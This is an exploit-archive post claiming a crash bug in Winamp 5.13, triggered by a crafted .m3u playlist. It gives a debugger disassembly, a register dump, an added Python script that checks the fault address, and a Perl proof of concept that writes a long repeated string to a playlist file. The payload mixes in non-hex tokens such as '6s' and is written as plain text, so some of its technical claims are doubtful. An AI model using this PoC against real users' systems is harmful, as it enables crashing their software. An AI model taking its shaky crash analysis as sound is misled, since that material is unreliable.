Winamp 5.13 Full - Exception Handling Vulnerability
Source: fb.me/dark.puzzle Author: Dark-Puzzle Published: 2012-06-26
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1               ==========================================               1
 0                   Dark-Puzzle From Inj3ct0r TEAM                       1
 1               ==========================================               0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
# Exploit Title: Winamp 5.13 Full - Exception Handling Vulnerability.
# Author: Dark-Puzzle
# Category: Local Exploit
# Software Link: http://www.oldapps.com/winamp.php?old_winamp=214?download
# Date: 25 June 2012
# Version: 5.13 Full Version, previous versions may be vulnerable.
# Tested on: Windows XP SP2.

----------------------------------------------------------
Understanding the exploit:

* Executing file.m3u in Winamp 5.13 Full.

* After debugging the program, I discovered that this was an exception handling error
by an access violation, registered in [EAX] memory. Not by division by zero here.

Disassembly:
                              
7C928FCE  |.  57            PUSH EDI
7C928FCF  |.  1BC0          SBB EAX,EAX
7C928FD1  |.  F7D0          NOT EAX
7C928FD3  |.  25 40C1987C   AND EAX,7C98C140
7C928FD8  |.  8BF8          MOV EDI,EAX
7C928FDA  |.  8B46 10       MOV EAX,DWORD PTR DS:[ESI+10]
7C928FDD  |.  3BC3          CMP EAX,EBX
7C928FDF  |.  8945 FC       MOV DWORD PTR SS:[LOCAL.1],EAX
7C928FE2  |.  0F84 9E000000 JE 7C929086
7C928FE8  |>  8B06          MOV EAX,DWORD PTR DS:[ESI]
7C928FEA  |.  FF40 10       INC DWORD PTR DS:[EAX+10] <<---- Access Violation

Registers :

-------------
EAX 35206534
-------------
ECX 00000000
EDX 00487D00 
EBX 00000000
ESP 00D7FE00
EBP 00D7FE74
ESI 00487D00 
EDI 00000000
-------------
EIP 7C928FEA ntdll.7C928FEA
-------------



Error: Access Violation when writing to [35206544] - Application was unable to process exception.
Access Violation. Unhandled exception in winamp.exe

The thing here is that EAX held 35206534, but the access violation was at [35206544],
because the faulting instruction is "INC DWORD PTR DS:[EAX+10]", which writes to EAX + 0x10.

We can fill some NOPs in our exploitation code, but I prefer not to.
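
As an added triage example (not part of the original advisory): the script below recomputes the faulting address from the register dump and the "[EAX+10]" operand, then checks whether any register value, read as little-endian bytes, is printable text that also occurs in the playlist file. The function names and FILE_PREFIX (the opening characters of the PoC string) are choices made for this example.

```python
import re
import struct

# Register dump and fault line as printed in the advisory above.
CRASH_DUMP = """\
EAX 35206534
ECX 00000000
EDX 00487D00
EBX 00000000
ESP 00D7FE00
EBP 00D7FE74
ESI 00487D00
EDI 00000000
EIP 7C928FEA ntdll.7C928FEA
Error : Access Violation when writing to [35206544]
"""
FAULT_INSN = "INC DWORD PTR DS:[EAX+10]"
# Opening characters of the playlist text written by the PoC on this page.
FILE_PREFIX = b"4e 5f 6e 9a 1c 2a 6s 4d 00 00"

def parse_registers(dump):
    """Return {name: value} for each 'REG hexvalue' line of the dump."""
    pairs = re.findall(r"^(E[A-Z]{2}) ([0-9A-Fa-f]{8})\b", dump, re.M)
    return {name: int(value, 16) for name, value in pairs}

def effective_address(insn, regs):
    """Resolve a '[REG+disp]' operand; the debugger prints disp in hex."""
    reg, disp = re.search(r"\[(E[A-Z]{2})\+([0-9A-Fa-f]+)\]", insn).groups()
    return (regs[reg] + int(disp, 16)) & 0xFFFFFFFF

def ascii_bytes(value):
    """Little-endian bytes of a 32-bit value if all printable, else None."""
    raw = struct.pack("<I", value)
    return raw if all(0x20 <= b < 0x7F for b in raw) else None

def triage(dump, insn, file_data):
    """Compare computed and reported fault address; list file-derived registers."""
    regs = parse_registers(dump)
    reported = int(re.search(r"writing to \[([0-9A-Fa-f]+)\]", dump).group(1), 16)
    from_file = {}
    for name, value in regs.items():
        raw = ascii_bytes(value)
        if raw is not None and raw in file_data:
            from_file[name] = raw.decode("ascii")
    return {"computed": effective_address(insn, regs),
            "reported": reported, "from_file": from_file}

if __name__ == "__main__":
    print(triage(CRASH_DUMP, FAULT_INSN, FILE_PREFIX))
```

With the values from this page the result lists only EAX, whose bytes read "4e 5", the opening characters of the playlist text.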

-------------------------------------------------------------------

PoC:
#!/usr/bin/perl
my $file = "dark.m3u";
my $cr = "4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f4e 5f 6e 9a 1c 2a 6s 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4e 5f";
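# Write the playlist text to dark.m3u; stop with the OS error if the file cannot be created.
open(my $File, '>', $file) or die "Cannot open $file: $!";
print $File $cr;
close($File);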

-----------------------------------------------------------------
A memory corruption vulnerability may be possible.
-----------------------------------------------------------------

Dark-Puzzle (Souhail) .
Follow me : fb.me/dark.puzzle
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army

Greetz to : M.C.A , Team-Hunter , Jigs@w , All Inj3ct0r team Members ....

GREY HAT Mercy .

 